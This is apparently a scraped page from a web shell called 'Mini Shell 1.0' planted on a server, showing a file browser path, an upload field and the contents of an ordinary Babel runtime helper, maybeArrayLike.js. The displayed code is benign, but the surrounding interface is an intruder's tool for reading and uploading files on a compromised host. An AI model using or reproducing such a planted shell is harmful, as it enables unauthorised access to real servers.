HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/usr/share/node_modules/@babel/runtime-corejs2/helpers/esm/
Upload File :
Current File : //proc/self/root/usr/share/node_modules/@babel/runtime-corejs2/helpers/esm/maybeArrayLike.js
import _Array$isArray from "@babel/runtime-corejs2/core-js/array/is-array";
import arrayLikeToArray from "./arrayLikeToArray.js";
export default function _maybeArrayLike(next, arr, i) {
  if (arr && !_Array$isArray(arr) && typeof arr.length === "number") {
    var len = arr.length;
    return arrayLikeToArray(arr, i !== void 0 && i < len ? i : len);
  }
  return next(arr, i);
}